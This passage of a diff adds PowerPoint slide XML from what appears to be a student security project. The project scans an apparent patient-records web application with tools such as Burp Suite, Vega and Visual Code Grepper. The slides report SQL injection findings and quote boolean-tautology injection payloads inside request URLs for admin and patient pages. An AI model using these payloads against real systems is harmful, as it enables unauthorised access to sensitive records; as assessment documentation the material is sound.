+          <a:bodyPr rtlCol="0" anchor="ctr"/>
+          <a:lstStyle/>
+          <a:p>
+            <a:pPr algn="ctr"/>
+            <a:endParaRPr lang="en-US"/>
+          </a:p>
+        </p:txBody>
+      </p:sp>
+      <p:sp>
+        <p:nvSpPr>
+          <p:cNvPr id="12" name="Oval 11">
+            <a:extLst>
+              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
+                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{BAC87F6E-526A-49B5-995D-42DB656594C9}"/>
+              </a:ext>
+              <a:ext uri="{C183D7F6-B498-43B3-948B-1728B52AA6E4}">
+                <adec:decorative xmlns:adec="http://schemas.microsoft.com/office/drawing/2017/decorative" val="1"/>
+              </a:ext>
+            </a:extLst>
+          </p:cNvPr>
+          <p:cNvSpPr>
+            <a:spLocks noGrp="1" noRot="1" noChangeAspect="1" noMove="1" noResize="1" noEditPoints="1" noAdjustHandles="1" noChangeArrowheads="1" noChangeShapeType="1" noTextEdit="1"/>
+          </p:cNvSpPr>
+          <p:nvPr>
+            <p:extLst>
+              <p:ext uri="{386F3935-93C4-4BCD-93E2-E3B085C9AB24}">
+                <p16:designElem xmlns:p16="http://schemas.microsoft.com/office/powerpoint/2015/main" val="1"/>
+              </p:ext>
+            </p:extLst>
+          </p:nvPr>
+        </p:nvSpPr>
+        <p:spPr>
+          <a:xfrm>
+            <a:off x="1117423" y="1443035"/>
+            <a:ext cx="3971932" cy="3971930"/>
+          </a:xfrm>
+          <a:prstGeom prst="ellipse">
+            <a:avLst/>
+          </a:prstGeom>
+          <a:solidFill>
+            <a:srgbClr val="FFFFFF"/>
+          </a:solidFill>
+          <a:ln w="31750">
+            <a:solidFill>
+              <a:schemeClr val="accent2">
+                <a:lumMod val="75000"/>
+              </a:schemeClr>
+            </a:solidFill>
+          </a:ln>
+        </p:spPr>
+        <p:style>
+          <a:lnRef idx="2">
+            <a:schemeClr val="accent1">
+              <a:shade val="50000"/>
+            </a:schemeClr>
+          </a:lnRef>
+          <a:fillRef idx="1">
+            <a:schemeClr val="accent1"/>
+          </a:fillRef>
+          <a:effectRef idx="0">
+            <a:schemeClr val="accent1"/>
+          </a:effectRef>
+          <a:fontRef idx="minor">
+            <a:schemeClr val="lt1"/>
+          </a:fontRef>
+        </p:style>
+        <p:txBody>
+          <a:bodyPr rtlCol="0" anchor="ctr"/>
+          <a:lstStyle/>
+          <a:p>
+            <a:pPr algn="ctr"/>
+            <a:endParaRPr lang="en-US"/>
+          </a:p>
+        </p:txBody>
+      </p:sp>
+      <p:sp>
+        <p:nvSpPr>
+          <p:cNvPr id="2" name="Title 1">
+            <a:extLst>
+              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
+                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{67FB58CA-5A5F-4326-A227-6806389BC5FC}"/>
+              </a:ext>
+            </a:extLst>
+          </p:cNvPr>
+          <p:cNvSpPr>
+            <a:spLocks noGrp="1"/>
+          </p:cNvSpPr>
+          <p:nvPr>
+            <p:ph type="title"/>
+          </p:nvPr>
+        </p:nvSpPr>
+        <p:spPr>
+          <a:xfrm>
+            <a:off x="1260873" y="1586484"/>
+            <a:ext cx="3685032" cy="3685032"/>
+          </a:xfrm>
+          <a:prstGeom prst="ellipse">
+            <a:avLst/>
+          </a:prstGeom>
+          <a:solidFill>
+            <a:schemeClr val="accent2">
+              <a:lumMod val="75000"/>
+            </a:schemeClr>
+          </a:solidFill>
+          <a:ln>
+            <a:noFill/>
+          </a:ln>
+        </p:spPr>
+        <p:txBody>
+          <a:bodyPr>
+            <a:normAutofit/>
+          </a:bodyPr>
+          <a:lstStyle/>
+          <a:p>
+            <a:r>
+              <a:rPr lang="en-CA" sz="3000" dirty="0">
+                <a:solidFill>
+                  <a:srgbClr val="FFFFFF"/>
+                </a:solidFill>
+              </a:rPr>
+              <a:t>Analysis Tools</a:t>
+            </a:r>
+          </a:p>
+        </p:txBody>
+      </p:sp>
+      <p:sp>
+        <p:nvSpPr>
+          <p:cNvPr id="3" name="Content Placeholder 2">
+            <a:extLst>
+              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
+                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{CF07E72F-443B-4430-B4EF-193F1578C80F}"/>
+              </a:ext>
+            </a:extLst>
+          </p:cNvPr>
+          <p:cNvSpPr>
+            <a:spLocks noGrp="1"/>
+          </p:cNvSpPr>
+          <p:nvPr>
+            <p:ph idx="1"/>
+          </p:nvPr>
+        </p:nvSpPr>
+        <p:spPr>
+          <a:xfrm>
+            <a:off x="5701005" y="83976"/>
+            <a:ext cx="6083558" cy="6774024"/>
+          </a:xfrm>
+        </p:spPr>
+        <p:txBody>
+          <a:bodyPr anchor="ctr">
+            <a:normAutofit/>
+          </a:bodyPr>
+          <a:lstStyle/>
+          <a:p>
+            <a:r>
+              <a:rPr lang="en-CA" dirty="0"/>
+              <a:t>Burp Suite Professional</a:t>
+            </a:r>
+          </a:p>
+          <a:p>
+            <a:r>
+              <a:rPr lang="en-CA" dirty="0"/>
+              <a:t>OWASP ZAP</a:t>
+            </a:r>
+          </a:p>
+          <a:p>
+            <a:r>
+              <a:rPr lang="en-CA" dirty="0" err="1"/>
+              <a:t>Arachni</a:t>
+            </a:r>
+            <a:endParaRPr lang="en-CA" dirty="0"/>
+          </a:p>
+          <a:p>
+            <a:r>
+              <a:rPr lang="en-CA" dirty="0"/>
+              <a:t>Wapiti</a:t>
+            </a:r>
+          </a:p>
+          <a:p>
+            <a:r>
+              <a:rPr lang="en-CA" dirty="0" err="1"/>
+              <a:t>Nikto</a:t>
+            </a:r>
+            <a:endParaRPr lang="en-CA" dirty="0"/>
+          </a:p>
+          <a:p>
+            <a:r>
+              <a:rPr lang="en-CA" dirty="0" err="1"/>
+              <a:t>SQLmap</a:t>
+            </a:r>
+            <a:endParaRPr lang="en-CA" dirty="0"/>
+          </a:p>
+          <a:p>
+            <a:r>
+              <a:rPr lang="en-CA" dirty="0"/>
+              <a:t>VCG</a:t>
+            </a:r>
+          </a:p>
+          <a:p>
+            <a:r>
+              <a:rPr lang="en-CA" dirty="0"/>
+              <a:t>Vega Vulnerability Scanner</a:t>
+            </a:r>
+          </a:p>
+          <a:p>
+            <a:endParaRPr lang="en-CA" dirty="0"/>
+          </a:p>
+          <a:p>
+            <a:pPr marL="0" indent="0">
+              <a:buNone/>
+            </a:pPr>
+            <a:r>
+              <a:rPr lang="en-CA" dirty="0" err="1"/>
+              <a:t>Github</a:t>
+            </a:r>
+            <a:r>
+              <a:rPr lang="en-CA" dirty="0"/>
+              <a:t> Repository of the project: https://github.com/ar4f4t/INSE-6140-Project </a:t>
+            </a:r>
+          </a:p>
+        </p:txBody>
+      </p:sp>
+    </p:spTree>
+    <p:extLst>
+      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
+        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="1042174031"/>
+      </p:ext>
+    </p:extLst>
+  </p:cSld>
+  <p:clrMapOvr>
+    <a:masterClrMapping/>
+  </p:clrMapOvr>
+</p:sld>
+</file>
+
+<file path=ppt/slides/slide5.xml><?xml version="1.0" encoding="utf-8"?>
+<p:sld xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main" xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" xmlns:p="http://schemas.openxmlformats.org/presentationml/2006/main">
+  <p:cSld>
+    <p:spTree>
+      <p:nvGrpSpPr>
+        <p:cNvPr id="1" name=""/>
+        <p:cNvGrpSpPr/>
+        <p:nvPr/>
+      </p:nvGrpSpPr>
+      <p:grpSpPr>
+        <a:xfrm>
+          <a:off x="0" y="0"/>
+          <a:ext cx="0" cy="0"/>
+          <a:chOff x="0" y="0"/>
+          <a:chExt cx="0" cy="0"/>
+        </a:xfrm>
+      </p:grpSpPr>
+      <p:sp>
+        <p:nvSpPr>
+          <p:cNvPr id="2" name="Title 1">
+            <a:extLst>
+              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
+                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{03639A6B-D570-435D-8062-E4A47A72D066}"/>
+              </a:ext>
+            </a:extLst>
+          </p:cNvPr>
+          <p:cNvSpPr>
+            <a:spLocks noGrp="1"/>
+          </p:cNvSpPr>
+          <p:nvPr>
+            <p:ph type="title"/>
+          </p:nvPr>
+        </p:nvSpPr>
+        <p:spPr>
+          <a:xfrm>
+            <a:off x="2231136" y="358202"/>
+            <a:ext cx="7729728" cy="1188720"/>
+          </a:xfrm>
+        </p:spPr>
+        <p:txBody>
+          <a:bodyPr/>
+          <a:lstStyle/>
+          <a:p>
+            <a:r>
+              <a:rPr lang="en-US" dirty="0"/>
+              <a:t>Visual Code </a:t>
+            </a:r>
+            <a:r>
+              <a:rPr lang="en-US" dirty="0" err="1"/>
+              <a:t>Grepper</a:t>
+            </a:r>
+            <a:endParaRPr lang="en-US" dirty="0"/>
+          </a:p>
+        </p:txBody>
+      </p:sp>
+      <p:pic>
+        <p:nvPicPr>
+          <p:cNvPr id="5" name="Content Placeholder 4" descr="A screen shot of a computer&#10;&#10;Description automatically generated">
+            <a:extLst>
+              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
+                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{044AD0ED-5CA9-447F-BC15-7FA5458FDB36}"/>
+              </a:ext>
+            </a:extLst>
+          </p:cNvPr>
+          <p:cNvPicPr>
+            <a:picLocks noGrp="1" noChangeAspect="1"/>
+          </p:cNvPicPr>
+          <p:nvPr>
+            <p:ph idx="1"/>
+          </p:nvPr>
+        </p:nvPicPr>
+        <p:blipFill rotWithShape="1">
+          <a:blip r:embed="rId2">
+            <a:extLst>
+              <a:ext uri="{28A0092B-C50C-407E-A947-70E740481C1C}">
+                <a14:useLocalDpi xmlns:a14="http://schemas.microsoft.com/office/drawing/2010/main" val="0"/>
+              </a:ext>
+            </a:extLst>
+          </a:blip>
+          <a:srcRect l="62757" t="1495" r="829"/>
+          <a:stretch/>
+        </p:blipFill>
+        <p:spPr>
+          <a:xfrm>
+            <a:off x="8250339" y="1924777"/>
+            <a:ext cx="3613183" cy="4303551"/>
+          </a:xfrm>
+        </p:spPr>
+      </p:pic>
+      <p:pic>
+        <p:nvPicPr>
+          <p:cNvPr id="7" name="Picture 6" descr="A screen shot of a computer&#10;&#10;Description automatically generated">
+            <a:extLst>
+              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
+                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{4F32D43F-787B-4E05-994D-A392E64B4E4C}"/>
+              </a:ext>
+            </a:extLst>
+          </p:cNvPr>
+          <p:cNvPicPr>
+            <a:picLocks noChangeAspect="1"/>
+          </p:cNvPicPr>
+          <p:nvPr/>
+        </p:nvPicPr>
+        <p:blipFill rotWithShape="1">
+          <a:blip r:embed="rId2">
+            <a:extLst>
+              <a:ext uri="{28A0092B-C50C-407E-A947-70E740481C1C}">
+                <a14:useLocalDpi xmlns:a14="http://schemas.microsoft.com/office/drawing/2010/main" val="0"/>
+              </a:ext>
+            </a:extLst>
+          </a:blip>
+          <a:srcRect t="1" r="42373" b="70770"/>
+          <a:stretch/>
+        </p:blipFill>
+        <p:spPr>
+          <a:xfrm>
+            <a:off x="242595" y="4916838"/>
+            <a:ext cx="7814797" cy="1745219"/>
+          </a:xfrm>
+          <a:prstGeom prst="rect">
+            <a:avLst/>
+          </a:prstGeom>
+        </p:spPr>
+      </p:pic>
+      <p:sp>
+        <p:nvSpPr>
+          <p:cNvPr id="9" name="TextBox 8">
+            <a:extLst>
+              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
+                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{B912A02C-E763-4E02-B8E0-7EF9D3E7EDBE}"/>
+              </a:ext>
+            </a:extLst>
+          </p:cNvPr>
+          <p:cNvSpPr txBox="1"/>
+          <p:nvPr/>
+        </p:nvSpPr>
+        <p:spPr>
+          <a:xfrm>
+            <a:off x="1023457" y="2315362"/>
+            <a:ext cx="5587067" cy="369332"/>
+          </a:xfrm>
+          <a:prstGeom prst="rect">
+            <a:avLst/>
+          </a:prstGeom>
+          <a:noFill/>
+        </p:spPr>
+        <p:txBody>
+          <a:bodyPr wrap="square" rtlCol="0">
+            <a:spAutoFit/>
+          </a:bodyPr>
+          <a:lstStyle/>
+          <a:p>
+            <a:pPr marL="285750" indent="-285750">
+              <a:buFont typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
+              <a:buChar char="•"/>
+            </a:pPr>
+            <a:r>
+              <a:rPr lang="en-US" dirty="0"/>
+              <a:t>Potential SQL Injection from </a:t>
+            </a:r>
+            <a:r>
+              <a:rPr lang="en-US" dirty="0" err="1"/>
+              <a:t>db.php</a:t>
+            </a:r>
+            <a:r>
+              <a:rPr lang="en-US" dirty="0"/>
+              <a:t> at Line 110</a:t>
+            </a:r>
+          </a:p>
+        </p:txBody>
+      </p:sp>
+    </p:spTree>
+    <p:extLst>
+      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
+        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="888984578"/>
+      </p:ext>
+    </p:extLst>
+  </p:cSld>
+  <p:clrMapOvr>
+    <a:masterClrMapping/>
+  </p:clrMapOvr>
+</p:sld>
+</file>
+
+<file path=ppt/slides/slide6.xml><?xml version="1.0" encoding="utf-8"?>
+<p:sld xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main" xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" xmlns:p="http://schemas.openxmlformats.org/presentationml/2006/main">
+  <p:cSld>
+    <p:spTree>
+      <p:nvGrpSpPr>
+        <p:cNvPr id="1" name=""/>
+        <p:cNvGrpSpPr/>
+        <p:nvPr/>
+      </p:nvGrpSpPr>
+      <p:grpSpPr>
+        <a:xfrm>
+          <a:off x="0" y="0"/>
+          <a:ext cx="0" cy="0"/>
+          <a:chOff x="0" y="0"/>
+          <a:chExt cx="0" cy="0"/>
+        </a:xfrm>
+      </p:grpSpPr>
+      <p:sp>
+        <p:nvSpPr>
+          <p:cNvPr id="2" name="Title 1">
+            <a:extLst>
+              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
+                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{49278B93-F714-4E58-8C45-27F33B53A9FE}"/>
+              </a:ext>
+            </a:extLst>
+          </p:cNvPr>
+          <p:cNvSpPr>
+            <a:spLocks noGrp="1"/>
+          </p:cNvSpPr>
+          <p:nvPr>
+            <p:ph type="title"/>
+          </p:nvPr>
+        </p:nvSpPr>
+        <p:spPr>
+          <a:xfrm>
+            <a:off x="2231136" y="87652"/>
+            <a:ext cx="7729728" cy="649504"/>
+          </a:xfrm>
+        </p:spPr>
+        <p:txBody>
+          <a:bodyPr>
+            <a:normAutofit fontScale="90000"/>
+          </a:bodyPr>
+          <a:lstStyle/>
+          <a:p>
+            <a:r>
+              <a:rPr lang="en-CA" dirty="0"/>
+              <a:t>Vega Report Analysis</a:t>
+            </a:r>
+          </a:p>
+        </p:txBody>
+      </p:sp>
+      <p:pic>
+        <p:nvPicPr>
+          <p:cNvPr id="5" name="Content Placeholder 4" descr="A screenshot of a social media post&#10;&#10;Description automatically generated">
+            <a:extLst>
+              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
+                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{A1FFBE2A-804C-4B54-BE93-7D82BBD2DD23}"/>
+              </a:ext>
+            </a:extLst>
+          </p:cNvPr>
+          <p:cNvPicPr>
+            <a:picLocks noGrp="1" noChangeAspect="1"/>
+          </p:cNvPicPr>
+          <p:nvPr>
+            <p:ph idx="1"/>
+          </p:nvPr>
+        </p:nvPicPr>
+        <p:blipFill>
+          <a:blip r:embed="rId2">
+            <a:extLst>
+              <a:ext uri="{28A0092B-C50C-407E-A947-70E740481C1C}">
+                <a14:useLocalDpi xmlns:a14="http://schemas.microsoft.com/office/drawing/2010/main" val="0"/>
+              </a:ext>
+            </a:extLst>
+          </a:blip>
+          <a:stretch>
+            <a:fillRect/>
+          </a:stretch>
+        </p:blipFill>
+        <p:spPr>
+          <a:xfrm>
+            <a:off x="4892816" y="849086"/>
+            <a:ext cx="7186488" cy="5921262"/>
+          </a:xfrm>
+        </p:spPr>
+      </p:pic>
+      <p:sp>
+        <p:nvSpPr>
+          <p:cNvPr id="6" name="TextBox 5">
+            <a:extLst>
+              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
+                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{D6E26A76-D97B-44AB-A427-EB78D2D542F6}"/>
+              </a:ext>
+            </a:extLst>
+          </p:cNvPr>
+          <p:cNvSpPr txBox="1"/>
+          <p:nvPr/>
+        </p:nvSpPr>
+        <p:spPr>
+          <a:xfrm>
+            <a:off x="412381" y="1248333"/>
+            <a:ext cx="4453079" cy="3139321"/>
+          </a:xfrm>
+          <a:prstGeom prst="rect">
+            <a:avLst/>
+          </a:prstGeom>
+          <a:noFill/>
+        </p:spPr>
+        <p:txBody>
+          <a:bodyPr wrap="none" rtlCol="0">
+            <a:spAutoFit/>
+          </a:bodyPr>
+          <a:lstStyle/>
+          <a:p>
+            <a:r>
+              <a:rPr lang="en-CA" b="1" u="sng" dirty="0">
+                <a:solidFill>
+                  <a:srgbClr val="404040"/>
+                </a:solidFill>
+              </a:rPr>
+              <a:t>SQL injection: </a:t>
+            </a:r>
+          </a:p>
+          <a:p>
+            <a:endParaRPr lang="en-CA" b="1" u="sng" dirty="0">
+              <a:solidFill>
+                <a:srgbClr val="404040"/>
+              </a:solidFill>
+            </a:endParaRPr>
+          </a:p>
+          <a:p>
+            <a:r>
+              <a:rPr lang="en-CA" u="sng" dirty="0">
+                <a:solidFill>
+                  <a:srgbClr val="404040"/>
+                </a:solidFill>
+              </a:rPr>
+              <a:t>Authenticated Automatic Scan</a:t>
+            </a:r>
+          </a:p>
+          <a:p>
+            <a:endParaRPr lang="en-CA" b="1" dirty="0">
+              <a:solidFill>
+                <a:srgbClr val="404040"/>
+              </a:solidFill>
+            </a:endParaRPr>
+          </a:p>
+          <a:p>
+            <a:pPr marL="342900" indent="-342900">
+              <a:buAutoNum type="arabicPeriod"/>
+            </a:pPr>
+            <a:r>
+              <a:rPr lang="en-CA" dirty="0">
+                <a:solidFill>
+                  <a:srgbClr val="404040"/>
+                </a:solidFill>
+              </a:rPr>
+              <a:t>GET Request  from </a:t>
+            </a:r>
+          </a:p>
+          <a:p>
+            <a:r>
+              <a:rPr lang="en-CA" dirty="0" err="1">
+                <a:solidFill>
+                  <a:srgbClr val="404040"/>
+                </a:solidFill>
+              </a:rPr>
+              <a:t>patient_prescription.php</a:t>
+            </a:r>
+            <a:r>
+              <a:rPr lang="en-CA" dirty="0">
+                <a:solidFill>
+                  <a:srgbClr val="404040"/>
+                </a:solidFill>
+              </a:rPr>
+              <a:t> with parameter</a:t>
+            </a:r>
+          </a:p>
+          <a:p>
+            <a:r>
+              <a:rPr lang="en-CA" dirty="0">
+                <a:solidFill>
+                  <a:srgbClr val="404040"/>
+                </a:solidFill>
+              </a:rPr>
+              <a:t>‘search=</a:t>
+            </a:r>
+            <a:r>
+              <a:rPr lang="en-CA" dirty="0" err="1">
+                <a:solidFill>
+                  <a:srgbClr val="404040"/>
+                </a:solidFill>
+              </a:rPr>
+              <a:t>vega</a:t>
+            </a:r>
+            <a:r>
+              <a:rPr lang="en-CA" dirty="0">
+                <a:solidFill>
+                  <a:srgbClr val="404040"/>
+                </a:solidFill>
+              </a:rPr>
+              <a:t>’”’</a:t>
+            </a:r>
+          </a:p>
+          <a:p>
+            <a:r>
+              <a:rPr lang="en-CA" dirty="0">
+                <a:solidFill>
+                  <a:srgbClr val="404040"/>
+                </a:solidFill>
+              </a:rPr>
+              <a:t>Output Result </a:t>
+            </a:r>
+            <a:r>
+              <a:rPr lang="en-CA" dirty="0">
+                <a:solidFill>
+                  <a:srgbClr val="404040"/>
+                </a:solidFill>
+                <a:sym typeface="Wingdings" panose="05000000000000000000" pitchFamily="2" charset="2"/>
+              </a:rPr>
+              <a:t> SQL syntax error message</a:t>
+            </a:r>
+          </a:p>
+          <a:p>
+            <a:endParaRPr lang="en-CA" dirty="0">
+              <a:solidFill>
+                <a:srgbClr val="404040"/>
+              </a:solidFill>
+              <a:sym typeface="Wingdings" panose="05000000000000000000" pitchFamily="2" charset="2"/>
+            </a:endParaRPr>
+          </a:p>
+          <a:p>
+            <a:r>
+              <a:rPr lang="en-CA" dirty="0">
+                <a:solidFill>
+                  <a:srgbClr val="404040"/>
+                </a:solidFill>
+                <a:sym typeface="Wingdings" panose="05000000000000000000" pitchFamily="2" charset="2"/>
+              </a:rPr>
+              <a:t>2. Same output results for </a:t>
+            </a:r>
+          </a:p>
+          <a:p>
+            <a:r>
+              <a:rPr lang="en-CA" dirty="0" err="1">
+                <a:solidFill>
+                  <a:srgbClr val="404040"/>
+                </a:solidFill>
+                <a:sym typeface="Wingdings" panose="05000000000000000000" pitchFamily="2" charset="2"/>
+              </a:rPr>
+              <a:t>patient_diagnosis.php</a:t>
+            </a:r>
+            <a:r>
+              <a:rPr lang="en-CA" dirty="0">
+                <a:solidFill>
+                  <a:srgbClr val="404040"/>
+                </a:solidFill>
+                <a:sym typeface="Wingdings" panose="05000000000000000000" pitchFamily="2" charset="2"/>
+              </a:rPr>
+              <a:t> and </a:t>
+            </a:r>
+            <a:r>
+              <a:rPr lang="en-CA" dirty="0" err="1">
+                <a:solidFill>
+                  <a:srgbClr val="404040"/>
+                </a:solidFill>
+                <a:sym typeface="Wingdings" panose="05000000000000000000" pitchFamily="2" charset="2"/>
+              </a:rPr>
+              <a:t>patient_history.php</a:t>
+            </a:r>
+            <a:endParaRPr lang="en-CA" dirty="0">
+              <a:solidFill>
+                <a:srgbClr val="404040"/>
+              </a:solidFill>
+            </a:endParaRPr>
+          </a:p>
+        </p:txBody>
+      </p:sp>
+    </p:spTree>
+    <p:extLst>
+      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
+        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="1744150631"/>
+      </p:ext>
+    </p:extLst>
+  </p:cSld>
+  <p:clrMapOvr>
+    <a:masterClrMapping/>
+  </p:clrMapOvr>
+</p:sld>
+</file>
+
+<file path=ppt/slides/slide7.xml><?xml version="1.0" encoding="utf-8"?>
+<p:sld xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main" xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" xmlns:p="http://schemas.openxmlformats.org/presentationml/2006/main">
+  <p:cSld>
+    <p:spTree>
+      <p:nvGrpSpPr>
+        <p:cNvPr id="1" name=""/>
+        <p:cNvGrpSpPr/>
+        <p:nvPr/>
+      </p:nvGrpSpPr>
+      <p:grpSpPr>
+        <a:xfrm>
+          <a:off x="0" y="0"/>
+          <a:ext cx="0" cy="0"/>
+          <a:chOff x="0" y="0"/>
+          <a:chExt cx="0" cy="0"/>
+        </a:xfrm>
+      </p:grpSpPr>
+      <p:sp>
+        <p:nvSpPr>
+          <p:cNvPr id="2" name="Title 1">
+            <a:extLst>
+              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
+                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{44699CC6-1D30-417E-879C-A91EA525A8B6}"/>
+              </a:ext>
+            </a:extLst>
+          </p:cNvPr>
+          <p:cNvSpPr>
+            <a:spLocks noGrp="1"/>
+          </p:cNvSpPr>
+          <p:nvPr>
+            <p:ph type="title"/>
+          </p:nvPr>
+        </p:nvSpPr>
+        <p:spPr>
+          <a:xfrm>
+            <a:off x="2013022" y="263763"/>
+            <a:ext cx="7729728" cy="646850"/>
+          </a:xfrm>
+        </p:spPr>
+        <p:txBody>
+          <a:bodyPr>
+            <a:normAutofit fontScale="90000"/>
+          </a:bodyPr>
+          <a:lstStyle/>
+          <a:p>
+            <a:r>
+              <a:rPr lang="en-CA" dirty="0"/>
+              <a:t>Burp suite Report Analysis</a:t>
+            </a:r>
+          </a:p>
+        </p:txBody>
+      </p:sp>
+      <p:sp>
+        <p:nvSpPr>
+          <p:cNvPr id="3" name="Content Placeholder 2">
+            <a:extLst>
+              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
+                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{7516D6CC-8548-46EC-ADC8-DC8A8D60E062}"/>
+              </a:ext>
+            </a:extLst>
+          </p:cNvPr>
+          <p:cNvSpPr>
+            <a:spLocks noGrp="1"/>
+          </p:cNvSpPr>
+          <p:nvPr>
+            <p:ph idx="1"/>
+          </p:nvPr>
+        </p:nvSpPr>
+        <p:spPr>
+          <a:xfrm>
+            <a:off x="370514" y="1157681"/>
+            <a:ext cx="11450972" cy="5297689"/>
+          </a:xfrm>
+        </p:spPr>
+        <p:txBody>
+          <a:bodyPr>
+            <a:normAutofit/>
+          </a:bodyPr>
+          <a:lstStyle/>
+          <a:p>
+            <a:pPr marL="0" indent="0">
+              <a:buNone/>
+            </a:pPr>
+            <a:r>
+              <a:rPr lang="en-CA" b="1" u="sng" dirty="0">
+                <a:solidFill>
+                  <a:srgbClr val="404040"/>
+                </a:solidFill>
+              </a:rPr>
+              <a:t>SQL injection: </a:t>
+            </a:r>
+          </a:p>
+          <a:p>
+            <a:pPr marL="342900" indent="-342900">
+              <a:buFont typeface="+mj-lt"/>
+              <a:buAutoNum type="arabicPeriod"/>
+            </a:pPr>
+            <a:r>
+              <a:rPr lang="en-GB" b="1" dirty="0">
+                <a:solidFill>
+                  <a:srgbClr val="404040"/>
+                </a:solidFill>
+              </a:rPr>
+              <a:t>/</a:t>
+            </a:r>
+            <a:r>
+              <a:rPr lang="en-GB" b="1" dirty="0" err="1">
+                <a:solidFill>
+                  <a:srgbClr val="404040"/>
+                </a:solidFill>
+              </a:rPr>
+              <a:t>ocms</a:t>
+            </a:r>
+            <a:r>
+              <a:rPr lang="en-GB" b="1" dirty="0">
+                <a:solidFill>
+                  <a:srgbClr val="404040"/>
+                </a:solidFill>
+              </a:rPr>
+              <a:t>/admin/</a:t>
+            </a:r>
+            <a:r>
+              <a:rPr lang="en-GB" b="1" dirty="0" err="1">
+                <a:solidFill>
+                  <a:srgbClr val="404040"/>
+                </a:solidFill>
+              </a:rPr>
+              <a:t>pageViewMembers.php?searchMembers</a:t>
+            </a:r>
+            <a:r>
+              <a:rPr lang="en-GB" b="1" dirty="0">
+                <a:solidFill>
+                  <a:srgbClr val="404040"/>
+                </a:solidFill>
+              </a:rPr>
+              <a:t>=145817&amp;groupID=0&amp;status=138707587%20or%209037%3d09037&amp;searchField=0&amp;page=1  </a:t>
+            </a:r>
+          </a:p>
+          <a:p>
+            <a:pPr marL="571500" lvl="1" indent="-342900">
+              <a:buFont typeface="+mj-lt"/>
+              <a:buAutoNum type="alphaLcParenR"/>
+            </a:pPr>
+            <a:r>
+              <a:rPr lang="en-GB" dirty="0">
+                <a:solidFill>
+                  <a:srgbClr val="404040"/>
+                </a:solidFill>
+              </a:rPr>
+              <a:t>Error Message: payload 38707587 or 9037=09037</a:t>
+            </a:r>
+          </a:p>
+          <a:p>
+            <a:pPr marL="571500" lvl="1" indent="-342900">
+              <a:buFont typeface="+mj-lt"/>
+              <a:buAutoNum type="alphaLcParenR"/>
+            </a:pPr>
+            <a:endParaRPr lang="en-CA" dirty="0">
+              <a:solidFill>
+                <a:srgbClr val="404040"/>
+              </a:solidFill>
+            </a:endParaRPr>
+          </a:p>
+          <a:p>
+            <a:pPr marL="342900" indent="-342900">
+              <a:buFont typeface="+mj-lt"/>
+              <a:buAutoNum type="arabicPeriod"/>
+            </a:pPr>
+            <a:r>
+              <a:rPr lang="en-GB" b="1" dirty="0">
+                <a:solidFill>
+                  <a:srgbClr val="404040"/>
+                </a:solidFill>
+              </a:rPr>
+              <a:t>/</a:t>
+            </a:r>
+            <a:r>
+              <a:rPr lang="en-GB" b="1" dirty="0" err="1">
+                <a:solidFill>
+                  <a:srgbClr val="404040"/>
+                </a:solidFill>
+              </a:rPr>
+              <a:t>ocms</a:t>
+            </a:r>
+            <a:r>
+              <a:rPr lang="en-GB" b="1" dirty="0">
+                <a:solidFill>
+                  <a:srgbClr val="404040"/>
+                </a:solidFill>
+              </a:rPr>
+              <a:t>/hooks/</a:t>
+            </a:r>
+            <a:r>
+              <a:rPr lang="en-GB" b="1" dirty="0" err="1">
+                <a:solidFill>
+                  <a:srgbClr val="404040"/>
+                </a:solidFill>
+              </a:rPr>
+              <a:t>patient_prescription.php?search</a:t>
+            </a:r>
+            <a:r>
+              <a:rPr lang="en-GB" b="1" dirty="0">
+                <a:solidFill>
+                  <a:srgbClr val="404040"/>
+                </a:solidFill>
+              </a:rPr>
+              <a:t>=90191398963262'%20or%208004%3d8004--%20</a:t>
+            </a:r>
+          </a:p>
+          <a:p>
+            <a:pPr marL="571500" lvl="1" indent="-342900">
+              <a:buFont typeface="+mj-lt"/>
+              <a:buAutoNum type="alphaLcParenR"/>
+            </a:pPr>
